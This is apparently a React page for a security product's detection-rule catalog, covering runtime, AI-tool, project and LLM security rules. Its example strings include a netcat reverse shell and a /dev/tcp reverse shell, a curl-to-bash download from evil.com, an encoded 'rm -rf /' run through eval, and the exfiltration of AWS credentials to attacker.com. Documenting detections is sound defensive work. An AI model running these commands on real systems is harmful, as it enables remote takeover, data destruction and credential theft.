import React, { useState, useMemo } from "react";
import { Search, Filter, ArrowRight, ChevronDown, ChevronUp } from "lucide-react";
import { Link } from "react-router-dom";

const SEVERITY_BADGE = {
  Critical: "text-[#ef4444] bg-red-950/50 border-red-800/30",
  High:     "text-[#f97316] bg-orange-950/50 border-orange-800/30",
  Medium:   "text-[#eab308] bg-yellow-950/50 border-yellow-800/30",
  Low:      "text-[#3b82f6] bg-blue-950/50 border-blue-800/30",
  Info:     "text-[#71717a] bg-zinc-900/50 border-zinc-700/30",
};

const ALL_RULES = [
  // Runtime Security
  { id: "SUPPLY_CHAIN_ABUSE", cat: "Runtime Security", sev: "Critical", mitre: "T1195.002", short: "Package manager spawning network tools with suspicious flags or destinations.", example: "npm install → /usr/bin/nc -e /bin/sh attacker.com 4444" },
  { id: "REVERSE_SHELL", cat: "Runtime Security", sev: "Critical", mitre: "T1059.004", short: "Process creates an outbound shell connection to a remote host.", example: "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1" },
  { id: "REMOTE_DOWNLOAD_EXEC", cat: "Runtime Security", sev: "Critical", mitre: "T1105", short: "Download-and-execute pattern: curl/wget piped directly to a shell.", example: "curl https://evil.com/payload.sh | bash" },
  { id: "OBFUSCATED_EXEC", cat: "Runtime Security", sev: "High", mitre: "T1027", short: "Base64-encoded or heavily obfuscated commands executed via eval.", example: "eval $(echo 'cm0gLXJmIC8='|base64 -d)" },
  { id: "CREDENTIAL_EXFIL", cat: "Runtime Security", sev: "High", mitre: "T1552.001", short: "Process reads credential files and initiates a network connection.", example: "cat ~/.aws/credentials && curl -d @- https://attacker.com" },
  { id: "SUSPICIOUS_PROCESS", cat: "Runtime Security", sev: "Medium", mitre: "T1055", short: "Known offensive-security tool or unexpected system binary launched.", example: "nmap, masscan, hydra spawned outside expected context" },
  { id: "KNOWN_HACKING_TOOL", cat: "Runtime Security", sev: "High", mitre: "T1588.002", short: "Recognized exploitation framework binary detected in process tree.", example: "msfconsole, sqlmap, metasploit-framework" },
  { id: "PERSISTENCE_MOD", cat: "Runtime Security", sev: "High", mitre: "T1547.001", short: "Modification of shell startup files or LaunchAgents for persistence.", example: ".bashrc, .zshrc, ~/Library/LaunchAgents/*.plist modified" },
  { id: "NETWORK_ANOMALY", cat: "Runtime Security", sev: "Medium", mitre: "T1071", short: "Outbound connection to an unusual port or protocol for this process.", example: "IDE process connecting on port 31337 or IRC ports" },
  { id: "DGA_DOMAIN", cat: "Runtime Security", sev: "Medium", mitre: "T1568.002", short: "Connection to domain matching DGA (domain generation algorithm) patterns.", example: "xkzqmbnpowr.ru, ajhfgpqxyz.net" },
  { id: "ENV_FILE_ACCESS", cat: "Runtime Security", sev: "High", mitre: "T1552.001", short: "Process reads .env, .env.production, or similar secret files.", example: "Cursor, npm subprocess reading .env.production" },
  { id: "SHELL_INJECTION", cat: "Runtime Security", sev: "High", mitre: "T1059.004", short: "Shell metacharacters injected into a subprocess argument string.", example: "node -e 'require(\"child_process\").exec(\"id;whoami\")'" },
  { id: "CRYPTO_MINER", cat: "Runtime Security", sev: "High", mitre: "T1496", short: "Cryptocurrency mining process or stratum protocol communication detected.", example: "xmrig, stratum+tcp://pool.minexmr.com:4444" },
  { id: "PRIV_ESCALATION", cat: "Runtime Security", sev: "High", mitre: "T1068", short: "Attempt to escalate privileges via sudo, SUID binary, or kernel exploit.", example: "Unexpected sudo execution from a build script" },
  { id: "LATERAL_MOVEMENT", cat: "Runtime Security", sev: "Critical", mitre: "T1021", short: "SSH or RDP connections spawned from non-interactive processes.", example: "npm post-install script spawning ssh to internal host" },

  // AI Activity
  { id: "AI_CREDENTIAL_ACCESS", cat: "AI Activity", sev: "High", mitre: "T1552", short: "AI coding tool reads credential or secrets files during a session.", example: "Cursor accessing ~/.aws/credentials or .env.local" },
  { id: "AI_NONWHITELISTED_ENDPOINT", cat: "AI Activity", sev: "Medium", mitre: "T1071", short: "AI tool connects to a network destination not in its known-good list.", example: "Cursor connecting to 45.33.32.156 (not api.cursor.sh)" },
  { id: "AI_SUSPICIOUS_PORT", cat: "AI Activity", sev: "Medium", mitre: "T1571", short: "AI tool initiates connection on a non-standard or suspicious port.", example: "Windsurf connecting on port 4444" },
  { id: "AI_PUBLIC_IP", cat: "AI Activity", sev: "High", mitre: "T1041", short: "AI tool sends data to a raw public IP address (no hostname).", example: "Copilot connecting directly to 104.21.45.10" },
  { id: "AI_LARGE_UPLOAD", cat: "AI Activity", sev: "High", mitre: "T1048", short: "AI tool uploads an unusually large payload to an external endpoint.", example: ">10MB upload from Cursor to non-whitelisted host" },
  { id: "AI_RAPID_FILE_ACCESS", cat: "AI Activity", sev: "Medium", mitre: "T1083", short: "AI tool accesses a large number of files in a short time window.", example: "Cursor reading 500+ files in under 10 seconds" },
  { id: "AI_PERSISTENCE", cat: "AI Activity", sev: "High", mitre: "T1547", short: "AI tool or related process modifies startup files for persistence.", example: "Cursor-spawned process editing ~/.bashrc" },
  { id: "AI_SPAWN_SHELL", cat: "AI Activity", sev: "Critical", mitre: "T1059", short: "AI tool spawns an interactive or privileged shell process.", example: "Cursor spawning /bin/bash with -i flag" },

  // Project Risk
  { id: "CI_WORKFLOW_MOD", cat: "Project Risk", sev: "Medium", mitre: "T1195.001", short: "Modification of CI/CD workflow configuration files.", example: ".github/workflows/deploy.yml modified" },
  { id: "INSTALLER_SCRIPT_CHANGE", cat: "Project Risk", sev: "High", mitre: "T1195.001", short: "Changes to install.sh, Makefile targets, or package manager scripts.", example: "install.sh modified, new postinstall script added" },
  { id: "SECRET_FILE_MOD", cat: "Project Risk", sev: "High", mitre: "T1552", short: ".env, .env.*, secrets.toml, or similar files modified.", example: ".env.production modified with new keys" },
  { id: "DEPENDENCY_CHANGE", cat: "Project Risk", sev: "Medium", mitre: "T1195.002", short: "package.json, requirements.txt, Cargo.toml, or lockfile changed.", example: "package-lock.json updated, 3 new transitive deps" },
  { id: "PRECOMMIT_HOOK_MOD", cat: "Project Risk", sev: "High", mitre: "T1195.001", short: ".pre-commit-config.yaml or .git/hooks/* files modified.", example: ".pre-commit-config.yaml — hook removed" },
  { id: "AI_CORRELATED_CHANGE", cat: "Project Risk", sev: "Info", mitre: "—", short: "Code change occurred within 60s of AI tool network activity.", example: "main.rs modified 30s after Cursor → unknown endpoint" },

  // LLM Security
  { id: "TOOL_AUTH_MISSING", cat: "LLM Security", sev: "High", mitre: "CWE-285", short: "LLM can invoke tool functions without any permission or auth check.", example: "llm.invoke_tool(name, args) — no user verification" },
  { id: "BLIND_TOOL_EXEC", cat: "LLM Security", sev: "High", mitre: "CWE-285", short: "Backend executes LLM tool calls without validating user privileges.", example: "execute_tool(result['tool_call']) — no privilege check" },
  { id: "MODEL_PRIV_ESCALATION", cat: "LLM Security", sev: "High", mitre: "CWE-269", short: "LLM is granted access level exceeding the requesting user's permissions.", example: "LLM has admin DB access, user is read-only" },
  { id: "PROMPT_SECRET_EXPOSURE", cat: "LLM Security", sev: "Critical", mitre: "CWE-312", short: "API keys or secrets embedded directly in system prompts.", example: "SYSTEM: 'You have key sk-abc123...' in f-string" },
  { id: "MULTIMODAL_TRUST", cat: "LLM Security", sev: "Medium", mitre: "CWE-346", short: "OCR-extracted or parsed content treated as trusted system instructions.", example: "Image text parsed and injected into system prompt" },
  { id: "DATA_POISONING_RISK", cat: "LLM Security", sev: "High", mitre: "CWE-20", short: "Unsanitized user input flows into fine-tuning or training datasets.", example: "User feedback directly appended to RLHF data files" },
  { id: "PROMPT_TEMPLATE_INJECTION", cat: "LLM Security", sev: "High", mitre: "CWE-94", short: "User-controlled data injected into f-string prompt templates without sanitization.", example: "prompt = f'Summarize: {user_input}'" },
  { id: "ROLE_SEPARATION_FAILURE", cat: "LLM Security", sev: "Medium", mitre: "CWE-284", short: "User messages can masquerade as System or Assistant turns.", example: "Messages array built from user-controlled JSON" },
  { id: "SCHEMA_VALIDATION_MISSING", cat: "LLM Security", sev: "Medium", mitre: "CWE-20", short: "LLM output used without enforcing expected format or schema.", example: "result['action'] executed without Pydantic validation" },
  { id: "SHADOW_AI_TOOL", cat: "LLM Security", sev: "Medium", mitre: "CWE-1357", short: "Unmonitored or undocumented AI tool detected in transitive dependencies.", example: "'openai' found in node_modules/some-util/package.json" },
  { id: "SHADOW_AI_ENDPOINT", cat: "LLM Security", sev: "High", mitre: "CWE-918", short: "Code calls an undocumented or unexpected LLM API endpoint.", example: "requests.post('https://openai.com/api/') in utility lib" },
  { id: "SESSION_ISOLATION_WEAKNESS", cat: "LLM Security", sev: "High", mitre: "CWE-668", short: "LLM context or memory could leak between different user sessions.", example: "Global conversation_history not scoped to user session" },

  // Baseline Anomalies
  { id: "SENSOR_BURST", cat: "Baseline Anomaly", sev: "Medium", mitre: "—", short: "Abnormally high event rate from a sensor (possible sensor issue or attack).", example: ">1000 file events/sec from File sensor" },
  { id: "NEW_UNSEEN_PROCESS", cat: "Baseline Anomaly", sev: "Info", mitre: "—", short: "A process binary never seen before in this environment was launched.", example: "First time /usr/local/bin/miner seen on this host" },
  { id: "NEW_NETWORK_DEST", cat: "Baseline Anomaly", sev: "Info", mitre: "—", short: "Network connection to a destination not seen during the warmup period.", example: "First connection to api.newservice.io from this machine" },
  { id: "NEW_PROJECT_PATTERN", cat: "Baseline Anomaly", sev: "Info", mitre: "—", short: "File change pattern in a project not seen before (new file types, locations).", example: "First time a .so file appeared in src/ directory" },
];

const CATEGORIES = ["All", "Runtime Security", "AI Activity", "Project Risk", "LLM Security", "Baseline Anomaly"];
const SEVERITIES = ["All", "Critical", "High", "Medium", "Low", "Info"];

const CAT_COLORS = {
  "Runtime Security": "text-[#ef4444]",
  "AI Activity":      "text-[#8b5cf6]",
  "Project Risk":     "text-[#06b6d4]",
  "LLM Security":     "text-[#f59e0b]",
  "Baseline Anomaly": "text-[#71717a]",
};

function RuleCard({ rule }) {
  const [open, setOpen] = useState(false);
  return (
    <div
      data-testid={`rule-card-${rule.id}`}
      className="border border-[#1a1a1a] rounded-lg bg-[#0d0d0d] overflow-hidden hover:border-[#262626] transition-colors"
    >
      <button
        data-testid={`rule-toggle-${rule.id}`}
        onClick={() => setOpen(!open)}
        className="w-full flex items-start gap-4 p-4 text-left"
      >
        <div className="flex-1 min-w-0">
          <div className="flex flex-wrap items-center gap-2 mb-1.5">
            <code className="text-xs font-mono text-[#ededed]">{rule.id}</code>
            {rule.mitre !== "—" && (
              <span className="text-xs font-mono text-[#52525b] border border-[#1a1a1a] px-1.5 py-0.5 rounded">
                {rule.mitre}
              </span>
            )}
          </div>
          <p className="text-xs text-[#71717a] leading-relaxed pr-4">{rule.short}</p>
        </div>
        <div className="flex items-center gap-3 shrink-0">
          <span className={`text-xs px-2 py-0.5 rounded border font-mono ${SEVERITY_BADGE[rule.sev]}`}>
            {rule.sev}
          </span>
          <span className={`text-xs font-mono ${CAT_COLORS[rule.cat] || "text-[#71717a]"}`}>
            {rule.cat.split(" ")[0]}
          </span>
          {open ? (
            <ChevronUp size={14} strokeWidth={1.5} className="text-[#52525b]" />
          ) : (
            <ChevronDown size={14} strokeWidth={1.5} className="text-[#52525b]" />
          )}
        </div>
      </button>
      {open && (
        <div className="border-t border-[#1a1a1a] px-4 py-4 space-y-3 animate-fade-in">
          <div>
            <p className="text-xs font-mono text-[#52525b] mb-1.5">Example Scenario</p>
            <code className="text-xs font-mono text-[#f59e0b] bg-[#050505] border border-[#1a1a1a] rounded px-3 py-2 block">
              {rule.example}
            </code>
          </div>
          <div className="flex items-center gap-2">
            <span className="text-xs font-mono text-[#52525b]">Category:</span>
            <span className={`text-xs font-mono ${CAT_COLORS[rule.cat]}`}>{rule.cat}</span>
          </div>
        </div>
      )}
    </div>
  );
}

export default function DetectionCatalogPage() {
  const [search, setSearch] = useState("");
  const [category, setCategory] = useState("All");
  const [severity, setSeverity] = useState("All");

  const filtered = useMemo(() => {
    return ALL_RULES.filter((r) => {
      const matchCat = category === "All" || r.cat === category;
      const matchSev = severity === "All" || r.sev === severity;
      const q = search.toLowerCase();
      const matchSearch = !q || r.id.toLowerCase().includes(q) || r.short.toLowerCase().includes(q) || r.cat.toLowerCase().includes(q);
      return matchCat && matchSev && matchSearch;
    });
  }, [search, category, severity]);

  const counts = useMemo(() => {
    const c = {};
    ALL_RULES.forEach((r) => { c[r.cat] = (c[r.cat] || 0) + 1; });
    return c;
  }, []);

  return (
    <div className="min-h-screen bg-[#0a0a0a] pt-14">

      {/* ── Header ────────────────────────────────── */}
      <section className="max-w-6xl mx-auto px-6 pt-24 pb-10">
        <p className="text-xs font-mono text-[#3f3f46] mb-4">/blackwall/detection-catalog</p>
        <h1 className="text-4xl md:text-5xl font-medium tracking-tight text-[#ededed] mb-4">
          Every Detection Rule,<br />Explained.
        </h1>
        <p className="text-base text-[#71717a] max-w-xl leading-relaxed mb-8">
          Blackwall's detection engine runs {ALL_RULES.length}+ rules across runtime security, AI activity, project monitoring, and LLM vulnerability scanning. Every rule is documented here.
        </p>

        {/* Category quick-stats */}
        <div className="flex flex-wrap gap-3 mb-8">
          {CATEGORIES.filter(c => c !== "All").map((cat) => (
            <button
              key={cat}
              data-testid={`cat-stat-${cat.replace(/ /g, "-").toLowerCase()}`}
              onClick={() => setCategory(cat)}
              className={`flex items-center gap-2 px-3 py-1.5 rounded-lg border text-xs transition-colors ${
                category === cat
                  ? "border-[#f59e0b]/30 bg-[#111111] text-[#ededed]"
                  : "border-[#1a1a1a] text-[#71717a] hover:border-[#262626]"
              }`}
            >
              <span className={CAT_COLORS[cat]}>●</span>
              {cat}
              <span className="text-[#3f3f46] font-mono">{counts[cat] || 0}</span>
            </button>
          ))}
        </div>

        {/* Search + filter bar */}
        <div className="flex flex-col md:flex-row gap-3">
          <div className="relative flex-1">
            <Search size={14} strokeWidth={1.5} className="absolute left-3 top-1/2 -translate-y-1/2 text-[#52525b]" />
            <input
              data-testid="catalog-search"
              type="text"
              value={search}
              onChange={(e) => setSearch(e.target.value)}
              placeholder="Search rules by ID or description..."
              className="w-full bg-[#0d0d0d] border border-[#262626] rounded-lg pl-9 pr-4 py-2.5 text-sm text-[#ededed] placeholder-[#52525b] focus:outline-none focus:border-[#3f3f46] font-mono"
            />
          </div>
          <select
            data-testid="catalog-filter-category"
            value={category}
            onChange={(e) => setCategory(e.target.value)}
            className="bg-[#0d0d0d] border border-[#262626] rounded-lg px-3 py-2.5 text-sm text-[#ededed] focus:outline-none focus:border-[#3f3f46] font-mono"
          >
            {CATEGORIES.map((c) => <option key={c} value={c}>{c}</option>)}
          </select>
          <select
            data-testid="catalog-filter-severity"
            value={severity}
            onChange={(e) => setSeverity(e.target.value)}
            className="bg-[#0d0d0d] border border-[#262626] rounded-lg px-3 py-2.5 text-sm text-[#ededed] focus:outline-none focus:border-[#3f3f46] font-mono"
          >
            {SEVERITIES.map((s) => <option key={s} value={s}>{s}</option>)}
          </select>
        </div>
      </section>

      {/* ── Results count ─────────────────────────── */}
      <div className="max-w-6xl mx-auto px-6 mb-4">
        <p className="text-xs font-mono text-[#52525b]">
          {filtered.length} rule{filtered.length !== 1 ? "s" : ""} found
          {(category !== "All" || severity !== "All" || search) && (
            <button
              data-testid="clear-filters-btn"
              onClick={() => { setSearch(""); setCategory("All"); setSeverity("All"); }}
              className="ml-3 text-[#f59e0b] hover:text-[#fbbf24] transition-colors"
            >
              Clear filters
            </button>
          )}
        </p>
      </div>

      {/* ── Rule cards ────────────────────────────── */}
      <section className="max-w-6xl mx-auto px-6 pb-20">
        <div className="space-y-2">
          {filtered.length === 0 ? (
            <div className="py-16 text-center">
              <p className="text-sm text-[#52525b] font-mono">No rules match your search.</p>
            </div>
          ) : (
            filtered.map((rule) => <RuleCard key={rule.id} rule={rule} />)
          )}
        </div>
      </section>

      {/* ── Bottom CTA ─────────────────────────────── */}
      <section className="border-t border-[#1a1a1a]">
        <div className="max-w-6xl mx-auto px-6 py-16 flex flex-col md:flex-row items-center justify-between gap-8">
          <div>
            <h3 className="text-xl font-medium text-[#ededed] mb-1">See these detections in action</h3>
            <p className="text-sm text-[#71717a]">Install Blackwall and start monitoring in under 60 seconds.</p>
          </div>
          <div className="flex gap-3">
            <Link
              to="/how-it-works"
              data-testid="catalog-howitworks-cta"
              className="flex items-center gap-2 px-5 py-2.5 text-sm bg-[#ededed] text-[#0a0a0a] font-medium rounded-full hover:bg-white transition-colors"
            >
              How It Works <ArrowRight size={14} strokeWidth={1.5} />
            </Link>
            <a
              href="#"
              data-testid="catalog-docs-cta"
              className="flex items-center gap-2 px-5 py-2.5 text-sm border border-[#262626] text-[#ededed] rounded-full hover:border-[#3f3f46] transition-colors"
            >
              Read the Docs
            </a>
          </div>
        </div>
      </section>
    </div>
  );
}
